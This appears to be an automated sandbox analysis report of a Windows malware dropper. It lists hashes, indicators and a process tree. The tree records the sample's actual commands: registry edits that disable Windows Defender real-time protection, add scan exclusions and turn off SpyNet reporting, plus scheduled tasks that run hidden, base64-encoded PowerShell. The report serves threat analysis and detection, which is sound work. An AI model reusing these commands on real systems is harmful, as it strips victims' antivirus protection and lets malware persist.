Overview
overview
10Static
static
8233f95c87f...31.exe
windows7-x64
8233f95c87f...31.exe
windows10-2004-x64
82d8ea1230d...aa.exe
windows7-x64
102d8ea1230d...aa.exe
windows10-2004-x64
1034dba85bb2...1a.exe
windows7-x64
834dba85bb2...1a.exe
windows10-2004-x64
8463d0b0903...ea.exe
windows7-x64
1463d0b0903...ea.exe
windows10-2004-x64
14bcf45bde8...39.exe
windows7-x64
14bcf45bde8...39.exe
windows10-2004-x64
15292b8004f...ce.exe
windows7-x64
105292b8004f...ce.exe
windows10-2004-x64
106babc5b52d...53.dll
windows7-x64
16babc5b52d...53.dll
windows10-2004-x64
185b73b7b3c...45.exe
windows7-x64
1085b73b7b3c...45.exe
windows10-2004-x64
108eb41b097a...ff.exe
windows7-x64
88eb41b097a...ff.exe
windows10-2004-x64
8932380926b...ef.exe
windows7-x64
5932380926b...ef.exe
windows10-2004-x64
89d8729b9ca...de.exe
windows7-x64
109d8729b9ca...de.exe
windows10-2004-x64
89e147a3bb2...53.dll
windows7-x64
19e147a3bb2...53.dll
windows10-2004-x64
1bccfdc8e1a...96.exe
windows7-x64
7bccfdc8e1a...96.exe
windows10-2004-x64
7bf5a9bb619...d7.exe
windows7-x64
1bf5a9bb619...d7.exe
windows10-2004-x64
1d0017384df...0a.exe
windows7-x64
1d0017384df...0a.exe
windows10-2004-x64
1d72aa8fe30...89.exe
windows7-x64
10d72aa8fe30...89.exe
windows10-2004-x64
10Resubmissions
15-11-2024 18:05
241115-wpjcdsxrdy 1011-11-2024 21:40
241111-1h6xbsxcql 1003-12-2022 17:54
221203-wg4ncscc33 10Analysis
-
max time kernel
151s -
max time network
156s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
03-12-2022 17:54
Behavioral task
behavioral1
Sample
233f95c87f4930fc7608e264cf8be9d4ff0d5f073c411dc986c7aa8ac2055231.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
233f95c87f4930fc7608e264cf8be9d4ff0d5f073c411dc986c7aa8ac2055231.exe
Resource
win10v2004-20221111-en
Behavioral task
behavioral3
Sample
2d8ea1230d6d994febd35edec21f298efe7e1a2a6f75d00a691035980f30a5aa.exe
Resource
win7-20220812-en
Behavioral task
behavioral4
Sample
2d8ea1230d6d994febd35edec21f298efe7e1a2a6f75d00a691035980f30a5aa.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral5
Sample
34dba85bb25c6589d0a5befe607e52b82a740402b92dbb5989797a523fb7561a.exe
Resource
win7-20220812-en
Behavioral task
behavioral6
Sample
34dba85bb25c6589d0a5befe607e52b82a740402b92dbb5989797a523fb7561a.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral7
Sample
463d0b090396ffa05d579521256e421080a955415554feebe490482551eb08ea.exe
Resource
win7-20220901-en
Behavioral task
behavioral8
Sample
463d0b090396ffa05d579521256e421080a955415554feebe490482551eb08ea.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral9
Sample
4bcf45bde8ef34c0afeea288098cf34da11c2748eead6cf4752db1a4a2e79c39.exe
Resource
win7-20220812-en
Behavioral task
behavioral10
Sample
4bcf45bde8ef34c0afeea288098cf34da11c2748eead6cf4752db1a4a2e79c39.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral11
Sample
5292b8004f9078cfddbb45f7a0a1d0e6c84a958e43e602f43f8af4161983b6ce.exe
Resource
win7-20220901-en
Behavioral task
behavioral12
Sample
5292b8004f9078cfddbb45f7a0a1d0e6c84a958e43e602f43f8af4161983b6ce.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral13
Sample
6babc5b52d59c0b41e526f06b9e751aeef7ad6fc8b9eef5f56f95d4e3cded853.dll
Resource
win7-20220812-en
Behavioral task
behavioral14
Sample
6babc5b52d59c0b41e526f06b9e751aeef7ad6fc8b9eef5f56f95d4e3cded853.dll
Resource
win10v2004-20220812-en
Behavioral task
behavioral15
Sample
85b73b7b3c9acc6648beb77ce878ebeea26a2a949bf17c3184f2bd4544d12b45.exe
Resource
win7-20220812-en
Behavioral task
behavioral16
Sample
85b73b7b3c9acc6648beb77ce878ebeea26a2a949bf17c3184f2bd4544d12b45.exe
Resource
win10v2004-20220901-en
Behavioral task
behavioral17
Sample
8eb41b097a51665e2a51b7d055260ea06b5224123450a147080de0a0ebcb4fff.exe
Resource
win7-20221111-en
Behavioral task
behavioral18
Sample
8eb41b097a51665e2a51b7d055260ea06b5224123450a147080de0a0ebcb4fff.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral19
Sample
932380926bc6bffcdf0bc446af37d140ce22426f651679e3b7d1c8fea83d14ef.exe
Resource
win7-20221111-en
Behavioral task
behavioral20
Sample
932380926bc6bffcdf0bc446af37d140ce22426f651679e3b7d1c8fea83d14ef.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral21
Sample
9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe
Resource
win7-20220901-en
Behavioral task
behavioral22
Sample
9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral23
Sample
9e147a3bb22a10fe3f032dda125b871c7892065a68acd85de372e4622ec2a753.dll
Resource
win7-20221111-en
Behavioral task
behavioral24
Sample
9e147a3bb22a10fe3f032dda125b871c7892065a68acd85de372e4622ec2a753.dll
Resource
win10v2004-20221111-en
Behavioral task
behavioral25
Sample
bccfdc8e1ac04a684732b0011d6b512118d3b6fb5a249803cd2e87427a965296.exe
Resource
win7-20221111-en
Behavioral task
behavioral26
Sample
bccfdc8e1ac04a684732b0011d6b512118d3b6fb5a249803cd2e87427a965296.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral27
Sample
bf5a9bb619ac4bdad9a043f41b3980bf442f3965564ce612ced3cb2352311fd7.exe
Resource
win7-20220812-en
Behavioral task
behavioral28
Sample
bf5a9bb619ac4bdad9a043f41b3980bf442f3965564ce612ced3cb2352311fd7.exe
Resource
win10v2004-20221111-en
Behavioral task
behavioral29
Sample
d0017384df7b41aba785a35c92082d1460af89204cfae22e6173eaebe16b270a.exe
Resource
win7-20220812-en
Behavioral task
behavioral30
Sample
d0017384df7b41aba785a35c92082d1460af89204cfae22e6173eaebe16b270a.exe
Resource
win10v2004-20220901-en
Behavioral task
behavioral31
Sample
d72aa8fe30b132afe13a9be90142550b530d9687aff41954bbd3503115f37489.exe
Resource
win7-20221111-en
Behavioral task
behavioral32
Sample
d72aa8fe30b132afe13a9be90142550b530d9687aff41954bbd3503115f37489.exe
Resource
win10v2004-20221111-en
General
-
Target
9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe
-
Size
6.3MB
-
MD5
ded964e022a37d93d434091ec75f9881
-
SHA1
e89a551ac1f19dc3838e21157667e2f98d84d06b
-
SHA256
9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde
-
SHA512
13f0873cc797eeb7a4a1606ea3dc95f0d1f96bf1dfad286ee3959f0b885426214c24c1ea2422a46191f78063b75200d7ad9065d5654a7758086a9e41f7cf75af
-
SSDEEP
196608:91OEVXHF+E/eq7QuIUVUMxVuAK1X84eu/k9RD13q:3OEVV+tq7Q7U62AAi84VkF13q
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\YSrBLfWUtIHnuviW = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\YSrBLfWUtIHnuviW = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\RqtPwFqMTiUn = "0" schtasks.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\UBqYudvSNocU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths Process not Found Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xonCRuklPFipnPeqKpR = "0" Process not Found Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\hrOORTLiECQfZJVB = "0" cmd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZUXSmeDRU = "0" conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\UBqYudvSNocU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xonCRuklPFipnPeqKpR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\RqtPwFqMTiUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZUXSmeDRU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oXjeNNLqKAotC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oXjeNNLqKAotC = "0" schtasks.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths schtasks.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths schtasks.exe -
Executes dropped EXE 2 IoCs
pid Process 1056 Install.exe 816 fzTYnzT.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Loads dropped DLL 4 IoCs
pid Process 1200 9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe 1056 Install.exe 1056 Install.exe 1056 Install.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths cmd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\hrOORTLiECQfZJVB = "0" cmd.exe -
Drops file in System32 directory 7 IoCs
description ioc Process File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini fzTYnzT.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol fzTYnzT.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol fzTYnzT.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\bKwcWZekAnYWEgmozo.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2008 schtasks.exe 424 schtasks.exe 2020 schtasks.exe 1396 schtasks.exe 1728 schtasks.exe 324 schtasks.exe 1896 schtasks.exe 1740 schtasks.exe 1012 schtasks.exe 2040 schtasks.exe 1036 schtasks.exe 1488 schtasks.exe 240 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 10 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" Process not Found Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 1136 powershell.EXE 1136 powershell.EXE 1136 powershell.EXE 1632 powershell.EXE 1632 powershell.EXE 1632 powershell.EXE 1368 powershell.EXE 1368 powershell.EXE 1368 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1136 powershell.EXE Token: SeDebugPrivilege 1632 powershell.EXE Token: SeDebugPrivilege 1368 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1200 wrote to memory of 1056 1200 9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe 27 PID 1200 wrote to memory of 1056 1200 9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe 27 PID 1200 wrote to memory of 1056 1200 9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe 27 PID 1200 wrote to memory of 1056 1200 9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe 27 PID 1200 wrote to memory of 1056 1200 9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe 27 PID 1200 wrote to memory of 1056 1200 9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe 27 PID 1200 wrote to memory of 1056 1200 9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe 27 PID 1056 wrote to memory of 820 1056 Install.exe 29 PID 1056 wrote to memory of 820 1056 Install.exe 29 PID 1056 wrote to memory of 820 1056 Install.exe 29 PID 1056 wrote to memory of 820 1056 Install.exe 29 PID 1056 wrote to memory of 820 1056 Install.exe 29 PID 1056 wrote to memory of 820 1056 Install.exe 29 PID 1056 wrote to memory of 820 1056 Install.exe 29 PID 1056 wrote to memory of 632 1056 Install.exe 34 PID 1056 wrote to memory of 632 1056 Install.exe 34 PID 1056 wrote to memory of 632 1056 Install.exe 34 PID 1056 wrote to memory of 632 1056 Install.exe 34 PID 1056 wrote to memory of 632 1056 Install.exe 34 PID 1056 wrote to memory of 632 1056 Install.exe 34 PID 1056 wrote to memory of 632 1056 Install.exe 34 PID 820 wrote to memory of 424 820 forfiles.exe 32 PID 820 wrote to memory of 424 820 forfiles.exe 32 PID 820 wrote to memory of 424 820 forfiles.exe 32 PID 820 wrote to memory of 424 820 forfiles.exe 32 PID 820 wrote to memory of 424 820 forfiles.exe 32 PID 820 wrote to memory of 424 820 forfiles.exe 32 PID 820 wrote to memory of 424 820 forfiles.exe 32 PID 632 wrote to memory of 2032 632 forfiles.exe 33 PID 632 wrote to memory of 2032 632 forfiles.exe 33 PID 632 wrote to memory of 2032 632 forfiles.exe 33 PID 632 wrote to memory of 2032 632 forfiles.exe 33 PID 632 wrote to memory of 2032 632 forfiles.exe 33 PID 632 wrote to memory of 2032 632 forfiles.exe 33 PID 632 wrote to memory of 2032 632 forfiles.exe 33 PID 424 wrote to memory of 1104 424 cmd.exe 36 PID 424 wrote to memory of 1104 424 cmd.exe 36 PID 424 wrote to memory of 1104 424 cmd.exe 36 PID 424 wrote to memory of 1104 424 cmd.exe 36 PID 424 wrote to memory of 1104 424 cmd.exe 36 PID 424 wrote to memory of 1104 424 cmd.exe 36 PID 424 wrote to memory of 1104 424 cmd.exe 36 PID 2032 wrote to memory of 1912 2032 cmd.exe 35 PID 2032 wrote to memory of 1912 2032 cmd.exe 35 PID 2032 wrote to memory of 1912 2032 cmd.exe 35 PID 2032 wrote to memory of 1912 2032 cmd.exe 35 PID 2032 wrote to memory of 1912 2032 cmd.exe 35 PID 2032 wrote to memory of 1912 2032 cmd.exe 35 PID 2032 wrote to memory of 1912 2032 cmd.exe 35 PID 2032 wrote to memory of 1156 2032 cmd.exe 38 PID 2032 wrote to memory of 1156 2032 cmd.exe 38 PID 2032 wrote to memory of 1156 2032 cmd.exe 38 PID 2032 wrote to memory of 1156 2032 cmd.exe 38 PID 2032 wrote to memory of 1156 2032 cmd.exe 38 PID 2032 wrote to memory of 1156 2032 cmd.exe 38 PID 2032 wrote to memory of 1156 2032 cmd.exe 38 PID 424 wrote to memory of 1176 424 cmd.exe 37 PID 424 wrote to memory of 1176 424 cmd.exe 37 PID 424 wrote to memory of 1176 424 cmd.exe 37 PID 424 wrote to memory of 1176 424 cmd.exe 37 PID 424 wrote to memory of 1176 424 cmd.exe 37 PID 424 wrote to memory of 1176 424 cmd.exe 37 PID 424 wrote to memory of 1176 424 cmd.exe 37 PID 1056 wrote to memory of 324 1056 Install.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe"C:\Users\Admin\AppData\Local\Temp\9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1200 -
C:\Users\Admin\AppData\Local\Temp\7zS2C7E.tmp\Install.exe.\Install.exe /S /site_id "525403"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"3⤵
- Suspicious use of WriteProcessMemory
PID:820 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&4⤵
- Suspicious use of WriteProcessMemory
PID:424 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:325⤵PID:1104
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:645⤵PID:1176
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"3⤵
- Suspicious use of WriteProcessMemory
PID:632
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gbLcEZgWV" /SC once /ST 05:33:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:324
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gbLcEZgWV"3⤵PID:780
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gbLcEZgWV"3⤵PID:1588
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bKwcWZekAnYWEgmozo" /SC once /ST 17:57:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\fzTYnzT.exe\" q8 /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2008
-
-
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&1⤵
- Suspicious use of WriteProcessMemory
PID:2032 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:322⤵PID:1912
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:642⤵PID:1156
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {13A42C1D-70BA-4CE5-9438-78F7792847D6} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]1⤵PID:332
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1136 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1052
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1632 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1900
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1368 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:436
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵PID:2028
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1660
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1644
-
C:\Windows\system32\taskeng.exetaskeng.exe {10F470EE-4B87-463F-9FD5-D8A7FAF699F4} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1580
-
C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\fzTYnzT.exeC:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\fzTYnzT.exe q8 /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:816 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gVYZViATT" /SC once /ST 05:01:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:424
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gVYZViATT"3⤵PID:820
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gVYZViATT"3⤵PID:976
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:936
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1080
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1304
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
